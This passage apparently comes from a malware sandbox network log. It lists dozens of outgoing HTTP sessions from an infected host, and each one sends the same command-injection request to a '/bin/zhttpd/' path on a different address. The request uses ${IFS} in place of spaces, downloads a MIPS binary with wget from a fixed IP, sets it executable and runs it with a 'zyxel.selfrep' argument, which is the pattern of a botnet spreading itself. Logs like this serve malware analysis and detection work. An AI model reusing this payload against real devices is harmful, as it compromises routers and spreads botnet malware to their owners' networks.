                                                Jan 12, 2024 18:16:34.720031023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7334192.168.2.2354474178.31.180.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.720062017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7335192.168.2.2339700183.95.65.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.720109940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7336192.168.2.233996085.178.35.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.720140934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7337192.168.2.2358524186.22.50.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.720181942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7338192.168.2.2357986186.63.207.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.720231056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7339192.168.2.234491446.179.3.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.720266104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7340192.168.2.2351182167.21.51.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.720303059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7341192.168.2.2354144140.192.135.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.720343113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7342192.168.2.2351334153.235.105.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.720391035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7343192.168.2.235528288.150.106.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.720438004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7344192.168.2.2333388131.152.96.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.720465899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7345192.168.2.2335014185.228.192.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.720521927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7346192.168.2.2348948120.54.86.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.720565081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7347192.168.2.234383061.120.121.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.720602989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7348192.168.2.2350870171.194.175.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.720634937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7349192.168.2.23505502.62.71.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.720673084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7350192.168.2.2360758157.153.9.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.720712900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7351192.168.2.233585868.19.177.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.720761061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7352192.168.2.233565481.43.35.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.720777035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7353192.168.2.23532665.190.89.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.720807076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7354192.168.2.23581102.120.45.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.720829010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7355192.168.2.235769689.189.9.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.720891953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7356192.168.2.2339346198.21.192.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.720932961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7357192.168.2.233886494.202.53.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.720978022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7358192.168.2.235817625.17.147.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.720992088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7359192.168.2.2351502100.39.74.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.721048117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7360192.168.2.2335708139.78.147.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.721082926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7361192.168.2.2344876169.12.151.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.721127987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7362192.168.2.235286641.70.147.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.721151114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7363192.168.2.2342572131.191.241.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.721223116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7364192.168.2.233572251.222.64.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.721255064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7365192.168.2.2353342100.17.43.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.721313000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7366192.168.2.2354156137.226.150.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.721347094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7367192.168.2.234354082.17.98.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.721384048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7368192.168.2.234321414.176.240.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.721431017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7369192.168.2.2357390161.165.133.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.721461058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7370192.168.2.2334490209.227.217.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.721487045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7371192.168.2.2347442153.130.104.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.721539021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7372192.168.2.234422632.183.39.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.721565962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7373192.168.2.2333554159.94.21.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.721604109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7374192.168.2.233972038.119.109.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.721640110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7375192.168.2.2354974157.223.7.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.721698046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7376192.168.2.2346000150.210.8.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.721733093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7377192.168.2.2339050173.41.142.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.721772909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7378192.168.2.233763032.123.145.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.721813917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7379192.168.2.234375863.242.239.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.721857071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7380192.168.2.233825678.251.223.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.721893072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7381192.168.2.2360518104.151.147.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.721946955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7382192.168.2.233284247.80.96.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.721975088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7383192.168.2.2358582116.141.205.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.722033024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7384192.168.2.234876636.164.206.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.722086906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7385192.168.2.2333232140.30.35.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.722121954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7386192.168.2.234260424.133.45.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.722172976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7387192.168.2.235527632.160.97.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.722193956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7388192.168.2.2355362137.182.49.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.722215891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7389192.168.2.2339046108.43.212.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.722269058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7390192.168.2.2338840148.111.6.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.722316027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7391192.168.2.233577891.45.73.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.722341061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7392192.168.2.234138464.47.248.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.722393990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7393192.168.2.234012284.105.177.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.722419977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7394192.168.2.234895219.4.47.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.722455025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7395192.168.2.234526885.123.219.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.722486973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7396192.168.2.236010080.57.179.249443
                                                TimestampBytes transferredDirectionData
